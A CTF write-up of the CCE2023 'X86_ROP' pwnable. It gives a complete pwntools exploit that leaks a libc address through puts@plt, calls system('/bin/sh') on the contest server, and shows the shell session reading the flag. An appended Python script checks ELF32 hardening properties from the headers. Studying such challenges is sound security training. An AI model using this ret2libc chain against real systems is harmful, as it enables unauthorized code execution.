IT/CTF | 2023. 6. 6. 11:10

CCE2023 APOLLO PWNABLE [100] - X86_ROP


Description

X86 ROP

nc prob2.cstec.kr 5340

Attachment: for_user.zip (0.94 MB)

A 32-bit ROP challenge. The binary has a buffer overflow vulnerability, and PIE is disabled.

#!/usr/bin/python3
from pwn import *

p = remote("prob2.cstec.kr", 5340)

e = ELF("./x86_rop")      # challenge binary; with PIE disabled its PLT/GOT addresses are fixed
l = ELF("./libc.so.6")    # libc shipped with the challenge, used for symbol offsets

p.sendlineafter(b"Enter choice : ", b"1")

pr = 0x080491e5   # pop ; ret gadget in the binary, discards one stack slot before returning

# Stage 1: 24 bytes of buffer plus 4 bytes of saved ebp reach the return address.
# Call puts(puts@got) to leak the runtime address of puts, then return to main.
buf = b""
buf += b'A' * 24
buf += b'B' * 4
buf += p32(e.plt["puts"])
buf += p32(pr)
buf += p32(e.got["puts"])
buf += p32(e.sym["main"])

p.send(buf)

leak = p.recv(4)
leak = u32(leak)
leak -= l.sym["puts"]    # libc base = leaked puts address - offset of puts inside libc

print(hex(leak))

system = leak + l.sym["system"]
binsh = leak + list(l.search(b"/bin/sh"))[0]

p.sendlineafter(b"Enter choice : ", b"1")

# Stage 2: same overflow, now calling system("/bin/sh") with the resolved libc addresses.
buf = b""
buf += b'A' * 24
buf += b'B' * 4
buf += p32(system)
buf += p32(pr)
buf += p32(binsh)

p.send(buf)

p.interactive()
root@learner:/home/learner/Downloads/for_user# ./exploit.py
[+] Opening connection to prob2.cstec.kr on port 5340: Done
[*] '/home/learner/Downloads/for_user/x86_rop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] '/home/learner/Downloads/for_user/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
0xf7c9c000
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
apollob{a23c922d5d1c1b7c390241537c5e5021947d94151c4da48986482c4efbe74062ec2ac1f8d0130fa0dacdaf69ccd8c110801c420a86f781391661f0c2cd0b5f8a00}
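As an added, defender-side companion to the checksec lines in the run output above (this script is not part of the original writeup): a standard-library Python checker that reads the same four hardening properties straight from the ELF32 headers, together with a builder that constructs minimal sample images so the checker can run offline. It makes the security-relevant point of the writeup concrete: the chain only works because the binary is ET_EXEC (No PIE, so PLT/GOT addresses are fixed), has Partial RELRO (the GOT stays writable and resolvable through the PLT), and has no stack canary to stop the 28-byte overwrite. The canary test is a byte-string heuristic for `__stack_chk_fail`, and the sample images are constructed placeholders, not real binaries.

```python
#!/usr/bin/python3
"""Report the hardening properties of a little-endian 32-bit ELF by parsing
its headers (added example, standard library only).

The output mirrors the RELRO / Stack / NX / PIE lines pwntools' checksec
prints, so a defender can read from the file alone which mitigations a
ret2plt chain would have to defeat.
"""
import struct

# ELF constants (from the ELF specification / elf.h)
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X = 1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 8, 1

EHDR = "<16sHHIIIIIHHHHHH"   # Elf32_Ehdr, 52 bytes
PHDR = "<IIIIIIII"           # Elf32_Phdr, 32 bytes
DYN = "<iI"                  # Elf32_Dyn, 8 bytes


def elf32_mitigations(data: bytes) -> dict:
    """Return {'relro', 'canary', 'nx', 'pie'} for an ELF32 image given as bytes."""
    (ident, e_type, _, _, _, e_phoff, _, _, _,
     e_phentsize, e_phnum, *_) = struct.unpack_from(EHDR, data, 0)
    if ident[:4] != b"\x7fELF" or ident[4] != 1 or ident[5] != 1:
        raise ValueError("not a little-endian ELF32 file")

    phdrs = [struct.unpack_from(PHDR, data, e_phoff + i * e_phentsize)
             for i in range(e_phnum)]
    by_type = {p[0]: p for p in phdrs}

    # NX: a PT_GNU_STACK segment without PF_X means a non-executable stack.
    gnu_stack = by_type.get(PT_GNU_STACK)
    nx = gnu_stack is not None and not (gnu_stack[6] & PF_X)

    # PIE: a position-independent executable is linked as ET_DYN.
    pie = e_type == ET_DYN

    # RELRO: PT_GNU_RELRO marks the region made read-only after relocation.
    # It is "Full" only if the loader binds every symbol at start-up (BIND_NOW);
    # otherwise the GOT stays writable for lazy PLT resolution.
    relro = "No RELRO"
    if PT_GNU_RELRO in by_type:
        relro = "Full RELRO" if _binds_now(data, by_type.get(PT_DYNAMIC)) else "Partial RELRO"

    # Canary (heuristic): the compiler references __stack_chk_fail whenever it
    # emits stack protectors; checksec does the same lookup via the dynamic symbols.
    canary = b"__stack_chk_fail" in data

    return {"relro": relro, "canary": canary, "nx": nx, "pie": pie}


def _binds_now(data: bytes, dynamic) -> bool:
    """Walk the PT_DYNAMIC entries and report whether BIND_NOW is requested."""
    if dynamic is None:
        return False
    off = dynamic[1]   # p_offset of the dynamic section
    while True:
        tag, val = struct.unpack_from(DYN, data, off)
        off += struct.calcsize(DYN)
        if tag == DT_NULL:
            return False
        if tag == DT_BIND_NOW:
            return True
        if tag == DT_FLAGS and val & DF_BIND_NOW:
            return True
        if tag == DT_FLAGS_1 and val & DF_1_NOW:
            return True


def describe(data: bytes) -> str:
    """Format the result in the same four lines checksec prints."""
    m = elf32_mitigations(data)
    return "\n".join([
        f"RELRO:    {m['relro']}",
        f"Stack:    {'Canary found' if m['canary'] else 'No canary found'}",
        f"NX:       {'NX enabled' if m['nx'] else 'NX disabled'}",
        f"PIE:      {'PIE enabled' if m['pie'] else 'No PIE'}",
    ])


def build_elf32(pie=False, nx=True, relro="Partial RELRO", canary=False) -> bytes:
    """Construct a minimal, non-runnable ELF32 image with the chosen properties.

    Constructed sample data: only the header pieces the checker reads are
    emitted, there is no code in it. Defaults match the challenge binary's profile.
    """
    phdrs = [(PT_GNU_STACK, 0, 0, 0, 0, 0, 6 if nx else 7, 16)]   # RW or RWX stack
    if relro != "No RELRO":
        phdrs.append((PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1))
    ehdr_size, phdr_size = struct.calcsize(EHDR), struct.calcsize(PHDR)
    n_phdrs = len(phdrs) + 1                       # one more slot for PT_DYNAMIC
    dyn_off = ehdr_size + n_phdrs * phdr_size      # dynamic section follows the phdrs
    dyn_entries = [(DT_FLAGS, DF_BIND_NOW)] if relro == "Full RELRO" else []
    dyn_entries.append((DT_NULL, 0))
    dyn = b"".join(struct.pack(DYN, t, v) for t, v in dyn_entries)
    phdrs.append((PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), 6, 4))
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # ELFCLASS32, little-endian
    ehdr = struct.pack(EHDR, ident, ET_DYN if pie else ET_EXEC, 3, 1, 0,
                       ehdr_size, 0, 0, ehdr_size, phdr_size, n_phdrs, 0, 0, 0)
    strtab = b"\0__stack_chk_fail\0" if canary else b"\0"
    return ehdr + b"".join(struct.pack(PHDR, *p) for p in phdrs) + dyn + strtab


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(describe(f.read()))
    else:
        print(describe(build_elf32()))   # constructed sample with the challenge's profile
```

Run it on a real file with `./elfcheck.py ./x86_rop` (hypothetical file name) to compare against the checksec lines; with no argument it reports the constructed sample, which matches the challenge binary's "Partial RELRO / No canary / NX enabled / No PIE" profile.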